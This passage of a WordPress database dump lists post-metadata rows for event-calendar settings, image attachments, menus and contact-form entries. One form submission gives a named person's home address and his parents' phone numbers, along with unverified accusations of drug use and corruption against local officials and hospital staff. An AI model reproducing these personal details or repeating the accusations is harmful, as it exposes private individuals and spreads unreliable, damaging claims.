555-5555'),(133959,263966,'_field_47','Denver'),(133960,263966,'_field_50','Initiator-Larry Dixon'),(133961,263966,'_field_51','sdgadfgadfgadfg'),(133962,263966,'_form_id','5'),(133963,263966,'_seq_num','15'),(133964,263967,'protect_children',''),(133965,263967,'_field_43','adfa'),(133966,263967,'_field_44','adfad'),(133967,263967,'_field_45','choll.03@comcast.net'),(133968,263967,'_field_46','(555) 555-5555'),(133969,263967,'_field_47','Denver'),(133970,263967,'_field_50','Initiator-Larry Dixon'),(133971,263967,'_field_51','XZVCZXV'),(133972,263967,'_form_id','5'),(133973,263967,'_seq_num','16'),(133974,263968,'protect_children',''),(133975,263968,'_field_43','dfagsdga'),(133976,263968,'_field_44','afdgads'),(133977,263968,'_field_45','choll.03@comcast.net'),(133978,263968,'_field_46','(555) 555-5555'),(133979,263968,'_field_47','Co Springs'),(133980,263968,'_field_50','Initiator-Larry Dixon'),(133981,263968,'_field_51','dafdhaffda'),(133982,263968,'_form_id','5'),(133983,263968,'_seq_num','17'),(144900,265269,'mec_repeat_status','0'),(144899,265269,'mec_end_day_seconds','72000'),(144898,265269,'mec_end_time_ampm','PM'),(144897,265269,'mec_end_time_minutes','0'),(144896,265269,'mec_end_time_hour','8'),(144895,265269,'mec_end_date','2021-08-23'),(144894,265269,'mec_start_day_seconds','68400'),(144893,265269,'mec_start_time_ampm','PM'),(144892,265269,'mec_start_time_minutes','0'),(144891,265269,'mec_public','1'),(144890,265269,'mec_start_date','2021-08-23'),(144889,265269,'mec_start_time_hour','7'),(144888,265269,'mec_countdown_method','global'),(144887,265269,'mec_timezone','global'),(144886,265269,'mec_comment',''),(144885,265269,'one_occurrence','0'),(144884,265269,'mec_hide_time','0'),(144883,265269,'mec_hide_end_time','0'),(144882,265269,'mec_event_status','EventScheduled'),(144881,265269,'mec_fields','a:0:{}'),(144880,265269,'mec_op','a:0:{}'),(144879,265269,'mec_bfixed_fields','a:0:{}'),(144878,265269,'mec_reg_fields','a:0:{}'),(144877,265269,'mec_reg_fields_global_inheritance','1'),(144876,265269,'mec_ticket_variations','a:0:{}'),(144875,265269,'mec_ticket_variations_global_inheritance','1'),(144874,265269,'mec_fees','a:0:{}'),(144873,265269,'mec_booking','a:0:{}'),(144872,265269,'mec_tickets','a:0:{}'),(144871,265269,'mec_fees_global_inheritance','1'),(144870,265269,'mec_hourly_schedules','a:0:{}'),(144869,265269,'mec_not_in_days',''),(144868,265269,'mec_in_days',''),(144867,265269,'mec_repeat_end_at_date',''),(144866,265269,'mec_advanced_days','a:0:{}'),(144865,265269,'passster_protection_type','password'),(144864,265269,'passster_activate_global_protection',NULL),(144863,265269,'passster_activate_protection',NULL),(144862,265269,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(144861,265269,'mec_repeat_end_at_occurrences',''),(144860,265269,'mec_repeat_end',''),(144859,265269,'mec_repeat_interval','1'),(144858,265269,'mec_allday','0'),(144857,265269,'mec_certain_weekdays','a:0:{}'),(144856,265269,'mec_dont_show_map','0'),(144855,265269,'mec_location_id','118'),(144854,265269,'mec_color',''),(144853,265269,'protect_children',''),(144852,265269,'_edit_lock','1628522612:2'),(144851,265269,'_edit_last','2'),(152559,266153,'_thumbnail_id','266155'),(152560,266155,'original-file','2022/01/girl-smiling-on-hill-1-updraft-pre-smush-original.jpg'),(144848,265267,'_edit_last','2'),(144847,265267,'_edit_lock','1628520930:2'),(137285,264411,'_field_137','i am a eckist and christen baptist'),(137286,264411,'_field_138',' goldsboro nc 27530 there is drugs in goldsboro nc 27530 i have a masterss degree and a bachelors degree in goldsboro nc 27530 they did not hire me with my resume from wayne comunity college and mr pam minshaw the judge at wayne county  courthouse gave me fortyfive days in jail for nothing in mrs winders detention center for nothing , i contacted the cia fbi and the goldsboro police department. fire all of them i am a airborne veteran of the 82nd airborne division they shot me and it was a black boy that jumped me by piggley wiggly. they did nothing about it. i have a father 7707893222 robert faulk mother 9107979549 cora crawford. i am us army six years . wayne memorial hosp unc healthcare did not hire me like they should because i am black . they are inexperienced native americansworking at hospital in goldsboro nc please discharge them from hospital because they are bad employees on crack and drugs. they are dangerouse so be careful. thanks you guys  hooorahh airborne over and out. 309 east beech st goldsboro nc 27530 apt h  dennis faulk fire the mayor and district attorney of goldsboro nc . police have sex with prostitutes . they stink in thier bodies. check for your self'),(144846,265267,'protect_children',''),(144845,265267,'mec_color',''),(144844,265267,'mec_location_id','118'),(144843,265267,'mec_dont_show_map','0'),(144842,265267,'mec_certain_weekdays','a:0:{}'),(144841,265267,'mec_allday','0'),(144840,265267,'mec_repeat_interval','1'),(144839,265267,'mec_repeat_end',''),(144838,265267,'mec_repeat_end_at_occurrences',''),(162364,266723,'_wp_attached_file','2022/05/hilltop-joy.jpg'),(162365,266723,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:747;s:6:\"height\";i:386;s:4:\"file\";s:23:\"2022/05/hilltop-joy.jpg\";s:8:\"filesize\";i:60133;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"hilltop-joy-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11269;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"hilltop-joy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6191;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:23:\"hilltop-joy-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18798;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:23:\"hilltop-joy-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29504;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:23:\"hilltop-joy-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21111;}s:8:\"tileview\";a:5:{s:4:\"file\";s:23:\"hilltop-joy-300x386.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:386;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24177;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144837,265267,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(144836,265267,'passster_activate_protection',NULL),(144835,265267,'passster_activate_global_protection',NULL),(144834,265267,'passster_protection_type','password'),(144833,265267,'mec_advanced_days','a:0:{}'),(144832,265267,'mec_repeat_end_at_date',''),(137161,264374,'_EventOrigin','events-calendar'),(137159,264374,'protect_children',''),(137160,264374,'_tribe_modified_fields','a:28:{s:16:\"protect_children\";i:1618149062;s:12:\"_EventOrigin\";i:1618149062;s:10:\"_edit_last\";i:1618149127;s:10:\"post_title\";i:1618149204;s:12:\"post_content\";i:1619089085;s:11:\"post_status\";i:1618149127;s:13:\"_thumbnail_id\";i:1618149247;s:26:\"_RTECregistrationsDisabled\";i:1618149247;s:17:\"_RTECdeadlineType\";i:1618149247;s:19:\"_RTECwhoCanRegister\";i:1618149247;s:23:\"_RTEClimitRegistrations\";i:1618149247;s:21:\"_RTECmaxRegistrations\";i:1618149247;s:24:\"boldgrid_hide_page_title\";i:1618149247;s:16:\"_EventRecurrence\";i:1618149247;s:17:\"_EventShowMapLink\";i:1618149247;s:13:\"_EventShowMap\";i:1618149247;s:13:\"_EventVenueID\";i:1618149247;s:15:\"_EventStartDate\";i:1618149247;s:13:\"_EventEndDate\";i:1618149247;s:18:\"_EventStartDateUTC\";i:1618149247;s:16:\"_EventEndDateUTC\";i:1618149247;s:14:\"_EventDuration\";i:1618149247;s:20:\"_EventCurrencySymbol\";i:1618149247;s:22:\"_EventCurrencyPosition\";i:1618149247;s:10:\"_EventCost\";i:1618149247;s:9:\"_EventURL\";i:1618149247;s:14:\"_EventTimezone\";i:1618149247;s:18:\"_EventTimezoneAbbr\";i:1618149247;}'),(137230,264379,'_RTEClimitRegistrations','0'),(137224,264379,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1618149401;s:12:\"_EventOrigin\";i:1618149401;s:13:\"_thumbnail_id\";i:1618149401;s:26:\"_RTECregistrationsDisabled\";i:1618149760;s:17:\"_RTECdeadlineType\";i:1618149401;s:19:\"_RTECwhoCanRegister\";i:1618149401;s:23:\"_RTEClimitRegistrations\";i:1618149401;s:21:\"_RTECmaxRegistrations\";i:1618149401;s:24:\"boldgrid_hide_page_title\";i:1618149401;s:16:\"_EventRecurrence\";i:1618149401;s:17:\"_EventShowMapLink\";i:1618149401;s:13:\"_EventShowMap\";i:1618149401;s:13:\"_EventVenueID\";i:1618149401;s:15:\"_EventStartDate\";i:1618149760;s:13:\"_EventEndDate\";i:1618149760;s:18:\"_EventStartDateUTC\";i:1618149760;s:16:\"_EventEndDateUTC\";i:1618149760;s:14:\"_EventDuration\";i:1618149760;s:20:\"_EventCurrencySymbol\";i:1618149401;s:22:\"_EventCurrencyPosition\";i:1618149401;s:10:\"_EventCost\";i:1618149401;s:9:\"_EventURL\";i:1618149401;s:14:\"_EventTimezone\";i:1618149401;s:18:\"_EventTimezoneAbbr\";i:1618149401;s:12:\"_dp_original\";i:1618149401;s:10:\"_edit_last\";i:1618149425;s:12:\"post_content\";i:1618149760;s:10:\"post_title\";i:1618150910;s:16:\"tribe_events_cat\";i:1618172510;s:11:\"post_status\";i:1618149760;s:18:\"_RTECnumRegistered\";i:1620171588;}'),(137207,264374,'_EventStartDateUTC','2021-04-11 14:00:00'),(142398,265023,'protect_children',''),(142399,265023,'_edit_lock','1621023508:2'),(142394,265021,'_field_63','Hello. My husband and I both received our pink slips (HOO-RAAY!!) and. Are looking to find an ESA/initiator here in Colorado. \nThank you,\nDarlene'),(142395,265021,'_form_id','6'),(142396,265021,'_seq_num','3'),(142929,265084,'_wp_attached_file','2021/05/loveland-location-page-sized-1.jpg'),(144831,265267,'mec_in_days',''),(144830,265267,'mec_not_in_days',''),(144829,265267,'mec_hourly_schedules','a:0:{}'),(137235,264379,'_EventShowMap',''),(179391,268208,'mec_repeat_end_at_occurrences',''),(142490,247332,'_wp_old_date','2021-05-10'),(137244,264379,'_EventCost',''),(137234,264379,'_EventShowMapLink',''),(144828,265267,'mec_fees_global_inheritance','1'),(144827,265267,'mec_tickets','a:0:{}'),(144826,265267,'mec_booking','a:0:{}'),(137201,264374,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(137202,264374,'_EventShowMapLink',''),(137203,264374,'_EventShowMap',''),(137204,264374,'_EventVenueID','262305'),(137205,264374,'_EventStartDate','2021-04-11 08:00:00'),(137206,264374,'_EventEndDate','2021-04-11 17:00:00'),(144825,265267,'mec_fees','a:0:{}'),(137242,264379,'_EventCurrencySymbol',''),(137243,264379,'_EventCurrencyPosition','prefix'),(177207,267955,'mec_user_id','1000047'),(177208,267955,'mec_verified','1'),(137222,264379,'_EventOrigin','events-calendar'),(137216,263707,'mec_location_id','0'),(142441,265026,'_menu_item_xfn',''),(142442,265026,'_menu_item_url',''),(143446,265131,'_form_id','13'),(137236,264379,'_EventVenueID','262305'),(137237,264379,'_EventStartDate','2021-05-09 10:30:00'),(137229,264379,'_RTECwhoCanRegister','any'),(137208,264374,'_EventEndDateUTC','2021-04-11 23:00:00'),(142440,265026,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(142439,265026,'_menu_item_target',''),(137241,264379,'_EventDuration','3600'),(137231,264379,'_RTECmaxRegistrations','30'),(137215,264374,'_EventTimezoneAbbr','MDT'),(144824,265267,'mec_ticket_variations_global_inheritance','1'),(144823,265267,'mec_ticket_variations','a:0:{}'),(144822,265267,'mec_reg_fields_global_inheritance','1'),(144821,265267,'mec_reg_fields','a:0:{}'),(144820,265267,'mec_bfixed_fields','a:0:{}'),(144819,265267,'mec_op','a:0:{}'),(144818,265267,'mec_fields','a:0:{}'),(144817,265267,'mec_event_status','EventScheduled'),(142436,265026,'_menu_item_menu_item_parent','0'),(142437,265026,'_menu_item_object_id','265024'),(142438,265026,'_menu_item_object','page'),(142020,264957,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:524;s:6:\"height\";i:267;s:4:\"file\";s:30:\"2021/05/butterfly-flower-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"butterfly-flower-1-300x153.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"butterfly-flower-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:30:\"butterfly-flower-1-300x267.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:30:\"butterfly-flower-1-474x267.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:30:\"butterfly-flower-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:30:\"butterfly-flower-1-300x267.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"butterfly-flower-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(142480,247345,'_wp_old_date','2021-05-10'),(142453,247330,'_wp_old_date','2021-05-10'),(142455,247336,'_wp_old_date','2021-05-10'),(142460,264903,'_wp_old_date','2021-05-10'),(142462,264902,'_wp_old_date','2021-05-10'),(142464,264901,'_wp_old_date','2021-05-10'),(142470,247342,'_wp_old_date','2021-05-10'),(142472,261921,'_wp_old_date','2021-05-10'),(142474,247343,'_wp_old_date','2021-05-10'),(142476,247344,'_wp_old_date','2021-05-10'),(142434,265026,'boldgrid_in_page_containers','1'),(142435,265026,'_menu_item_type','post_type'),(142412,265023,'show_only_one_occurrence','0'),(142413,265023,'show_past_events','1'),(142414,265023,'show_only_past_events','0'),(142415,265023,'show_ongoing_events','0'),(142416,265023,'show_only_ongoing_events','0'),(142417,265023,'boldgrid_hide_page_title','0'),(142418,265024,'protect_children',''),(142419,265024,'_edit_lock','1653365521:2'),(142420,265024,'_edit_last','2'),(142421,265024,'_wp_page_template','default'),(142422,265024,'passster_activate_global_protection',NULL),(142423,265024,'passster_activate_protection',NULL),(142424,265024,'passster_protection_type','password'),(142425,265024,'boldgrid_hide_page_title','0'),(142426,265024,'boldgrid_in_page_containers','1'),(142427,265024,'bgseo_robots_index','index'),(142428,265024,'bgseo_robots_follow','follow'),(142429,265026,'protect_children',''),(142430,265026,'passster_activate_global_protection',NULL),(142431,265026,'passster_activate_protection',NULL),(142432,265026,'passster_protection_type','password'),(142433,265026,'boldgrid_hide_page_title','0'),(137248,264379,'_dp_original','264374'),(137221,264379,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1618149401;s:12:\"_EventOrigin\";i:1618149401;s:13:\"_thumbnail_id\";i:1618149401;s:26:\"_RTECregistrationsDisabled\";i:1618149760;s:17:\"_RTECdeadlineType\";i:1618149401;s:19:\"_RTECwhoCanRegister\";i:1618149401;s:23:\"_RTEClimitRegistrations\";i:1618149401;s:21:\"_RTECmaxRegistrations\";i:1618149401;s:24:\"boldgrid_hide_page_title\";i:1618149401;s:16:\"_EventRecurrence\";i:1618149401;s:17:\"_EventShowMapLink\";i:1618149401;s:13:\"_EventShowMap\";i:1618149401;s:13:\"_EventVenueID\";i:1618149401;s:15:\"_EventStartDate\";i:1618149760;s:13:\"_EventEndDate\";i:1618149760;s:18:\"_EventStartDateUTC\";i:1618149760;s:16:\"_EventEndDateUTC\";i:1618149760;s:14:\"_EventDuration\";i:1618149760;s:20:\"_EventCurrencySymbol\";i:1618149401;s:22:\"_EventCurrencyPosition\";i:1618149401;s:10:\"_EventCost\";i:1618149401;s:9:\"_EventURL\";i:1618149401;s:14:\"_EventTimezone\";i:1618149401;s:18:\"_EventTimezoneAbbr\";i:1618149401;s:12:\"_dp_original\";i:1618149401;s:10:\"_edit_last\";i:1618149425;s:12:\"post_content\";i:1618149760;s:10:\"post_title\";i:1618150910;s:16:\"tribe_events_cat\";i:1618172510;s:11:\"post_status\";i:1618149760;s:18:\"_RTECnumRegistered\";i:1620171588;}'),(144816,265267,'mec_hide_end_time','0'),(137220,264379,'protect_children',''),(137187,264374,'boldgrid_hide_page_title','0'),(137232,264379,'boldgrid_hide_page_title','0'),(137214,264374,'_EventTimezone','America/Denver'),(137247,264379,'_EventTimezoneAbbr','MDT'),(137240,264379,'_EventEndDateUTC','2021-05-09 17:30:00'),(137233,264379,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(137219,263707,'mec_additional_organizer_ids','a:0:{}'),(137186,264374,'_RTECmaxRegistrations','30'),(179364,268208,'mec_additional_organizer_ids','a:0:{}'),(179354,268208,'mec_color',''),(192811,269146,'mec_hide_end_time','0'),(192810,269146,'mec_hide_time','0'),(137225,264379,'_EventOrigin','events-calendar'),(137213,264374,'_EventURL',''),(137185,264374,'_RTEClimitRegistrations','0'),(137239,264379,'_EventStartDateUTC','2021-05-09 16:30:00'),(144815,265267,'mec_hide_time','0'),(144814,265267,'one_occurrence','0'),(137212,264374,'_EventCost',''),(137184,264374,'_RTECwhoCanRegister','any'),(144813,265267,'mec_comment',''),(137246,264379,'_EventTimezone','America/Denver'),(137227,264379,'_RTECregistrationsDisabled','0'),(137218,263707,'mec_organizer_id','0'),(137211,264374,'_EventCurrencyPosition','prefix'),(137183,264374,'_RTECdeadlineType','start'),(144812,265267,'mec_timezone','global'),(137250,264379,'_edit_last','2'),(137162,264374,'_edit_lock','1619115199:2'),(137163,264374,'_edit_last','2'),(137182,264374,'_RTECregistrationsDisabled','1'),(137245,264379,'_EventURL',''),(137238,264379,'_EventEndDate','2021-05-09 11:30:00'),(137228,264379,'_RTECdeadlineType','start'),(137217,263707,'mec_additional_location_ids','a:0:{}'),(134771,264126,'protect_children',''),(134772,264126,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1615406618;s:12:\"_EventOrigin\";i:1615406618;s:13:\"_thumbnail_id\";i:1615407339;s:24:\"boldgrid_hide_page_title\";i:1615406618;s:17:\"_EventShowMapLink\";i:1615406618;s:13:\"_EventShowMap\";i:1615406618;s:15:\"_EventStartDate\";i:1617202313;s:13:\"_EventEndDate\";i:1617202313;s:18:\"_EventStartDateUTC\";i:1617202313;s:16:\"_EventEndDateUTC\";i:1617202313;s:14:\"_EventDuration\";i:1615406618;s:20:\"_EventCurrencySymbol\";i:1615406618;s:22:\"_EventCurrencyPosition\";i:1615406618;s:10:\"_EventCost\";i:1615406618;s:9:\"_EventURL\";i:1615406618;s:14:\"_EventTimezone\";i:1615406618;s:18:\"_EventTimezoneAbbr\";i:1615407339;s:27:\"_EventNextPendingRecurrence\";i:1615406618;s:26:\"_RTECregistrationsDisabled\";i:1615406618;s:17:\"_RTECdeadlineType\";i:1615406618;s:19:\"_RTECwhoCanRegister\";i:1615406618;s:23:\"_RTEClimitRegistrations\";i:1615406618;s:21:\"_RTECmaxRegistrations\";i:1615406618;s:16:\"_EventRecurrence\";i:1615406618;s:18:\"_RTECnumRegistered\";i:1615406618;s:13:\"_EventVenueID\";i:1615406618;s:12:\"_dp_original\";i:1615406618;s:10:\"_edit_last\";i:1615406780;s:10:\"post_title\";i:1615406856;s:12:\"post_content\";i:1616530908;s:16:\"tribe_events_cat\";i:1617223913;s:11:\"post_status\";i:1615407339;}'),(134773,264126,'_EventOrigin','events-calendar'),(134774,264126,'protect_children',''),(134775,264126,'protect_children',''),(134776,264126,'protect_children',''),(134777,264126,'protect_children',''),(134778,264126,'protect_children',''),(134779,264126,'protect_children',''),(134780,264126,'protect_children',''),(134781,264126,'protect_children',''),(134782,264126,'protect_children',''),(134783,264126,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1615406618;s:12:\"_EventOrigin\";i:1615406618;s:13:\"_thumbnail_id\";i:1615407339;s:24:\"boldgrid_hide_page_title\";i:1615406618;s:17:\"_EventShowMapLink\";i:1615406618;s:13:\"_EventShowMap\";i:1615406618;s:15:\"_EventStartDate\";i:1617202313;s:13:\"_EventEndDate\";i:1617202313;s:18:\"_EventStartDateUTC\";i:1617202313;s:16:\"_EventEndDateUTC\";i:1617202313;s:14:\"_EventDuration\";i:1615406618;s:20:\"_EventCurrencySymbol\";i:1615406618;s:22:\"_EventCurrencyPosition\";i:1615406618;s:10:\"_EventCost\";i:1615406618;s:9:\"_EventURL\";i:1615406618;s:14:\"_EventTimezone\";i:1615406618;s:18:\"_EventTimezoneAbbr\";i:1615407339;s:27:\"_EventNextPendingRecurrence\";i:1615406618;s:26:\"_RTECregistrationsDisabled\";i:1615406618;s:17:\"_RTECdeadlineType\";i:1615406618;s:19:\"_RTECwhoCanRegister\";i:1615406618;s:23:\"_RTEClimitRegistrations\";i:1615406618;s:21:\"_RTECmaxRegistrations\";i:1615406618;s:16:\"_EventRecurrence\";i:1615406618;s:18:\"_RTECnumRegistered\";i:1615406618;s:13:\"_EventVenueID\";i:1615406618;s:12:\"_dp_original\";i:1615406618;s:10:\"_edit_last\";i:1615406780;s:10:\"post_title\";i:1615406856;s:12:\"post_content\";i:1616530908;s:16:\"tribe_events_cat\";i:1617223913;s:11:\"post_status\";i:1615407339;}'),(134815,264126,'_EventCurrencyPosition','prefix'),(134784,264126,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1615406618;s:12:\"_EventOrigin\";i:1615406618;s:13:\"_thumbnail_id\";i:1615407339;s:24:\"boldgrid_hide_page_title\";i:1615406618;s:17:\"_EventShowMapLink\";i:1615406618;s:13:\"_EventShowMap\";i:1615406618;s:15:\"_EventStartDate\";i:1617202313;s:13:\"_EventEndDate\";i:1617202313;s:18:\"_EventStartDateUTC\";i:1617202313;s:16:\"_EventEndDateUTC\";i:1617202313;s:14:\"_EventDuration\";i:1615406618;s:20:\"_EventCurrencySymbol\";i:1615406618;s:22:\"_EventCurrencyPosition\";i:1615406618;s:10:\"_EventCost\";i:1615406618;s:9:\"_EventURL\";i:1615406618;s:14:\"_EventTimezone\";i:1615406618;s:18:\"_EventTimezoneAbbr\";i:1615407339;s:27:\"_EventNextPendingRecurrence\";i:1615406618;s:26:\"_RTECregistrationsDisabled\";i:1615406618;s:17:\"_RTECdeadlineType\";i:1615406618;s:19:\"_RTECwhoCanRegister\";i:1615406618;s:23:\"_RTEClimitRegistrations\";i:1615406618;s:21:\"_RTECmaxRegistrations\";i:1615406618;s:16:\"_EventRecurrence\";i:1615406618;s:18:\"_RTECnumRegistered\";i:1615406618;s:13:\"_EventVenueID\";i:1615406618;s:12:\"_dp_original\";i:1615406618;s:10:\"_edit_last\";i:1615406780;s:10:\"post_title\";i:1615406856;s:12:\"post_content\";i:1616530908;s:16:\"tribe_events_cat\";i:1617223913;s:11:\"post_status\";i:1615407339;}'),(134814,264126,'_EventCurrencySymbol',''),(134785,264126,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1615406618;s:12:\"_EventOrigin\";i:1615406618;s:13:\"_thumbnail_id\";i:1615407339;s:24:\"boldgrid_hide_page_title\";i:1615406618;s:17:\"_EventShowMapLink\";i:1615406618;s:13:\"_EventShowMap\";i:1615406618;s:15:\"_EventStartDate\";i:1617202313;s:13:\"_EventEndDate\";i:1617202313;s:18:\"_EventStartDateUTC\";i:1617202313;s:16:\"_EventEndDateUTC\";i:1617202313;s:14:\"_EventDuration\";i:1615406618;s:20:\"_EventCurrencySymbol\";i:1615406618;s:22:\"_EventCurrencyPosition\";i:1615406618;s:10:\"_EventCost\";i:1615406618;s:9:\"_EventURL\";i:1615406618;s:14:\"_EventTimezone\";i:1615406618;s:18:\"_EventTimezoneAbbr\";i:1615407339;s:27:\"_EventNextPendingRecurrence\";i:1615406618;s:26:\"_RTECregistrationsDisabled\";i:1615406618;s:17:\"_RTECdeadlineType\";i:1615406618;s:19:\"_RTECwhoCanRegister\";i:1615406618;s:23:\"_RTEClimitRegistrations\";i:1615406618;s:21:\"_RTECmaxRegistrations\";i:1615406618;s:16:\"_EventRecurrence\";i:1615406618;s:18:\"_RTECnumRegistered\";i:1615406618;s:13:\"_EventVenueID\";i:1615406618;s:12:\"_dp_original\";i:1615406618;s:10:\"_edit_last\";i:1615406780;s:10:\"post_title\";i:1615406856;s:12:\"post_content\";i:1616530908;s:16:\"tribe_events_cat\";i:1617223913;s:11:\"post_status\";i:1615407339;}'),(134813,264126,'_EventDuration','3600'),(134816,264126,'_EventCost',''),(134786,264126,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1615406618;s:12:\"_EventOrigin\";i:1615406618;s:13:\"_thumbnail_id\";i:1615407339;s:24:\"boldgrid_hide_page_title\";i:1615406618;s:17:\"_EventShowMapLink\";i:1615406618;s:13:\"_EventShowMap\";i:1615406618;s:15:\"_EventStartDate\";i:1617202313;s:13:\"_EventEndDate\";i:1617202313;s:18:\"_EventStartDateUTC\";i:1617202313;s:16:\"_EventEndDateUTC\";i:1617202313;s:14:\"_EventDuration\";i:1615406618;s:20:\"_EventCurrencySymbol\";i:1615406618;s:22:\"_EventCurrencyPosition\";i:1615406618;s:10:\"_EventCost\";i:1615406618;s:9:\"_EventURL\";i:1615406618;s:14:\"_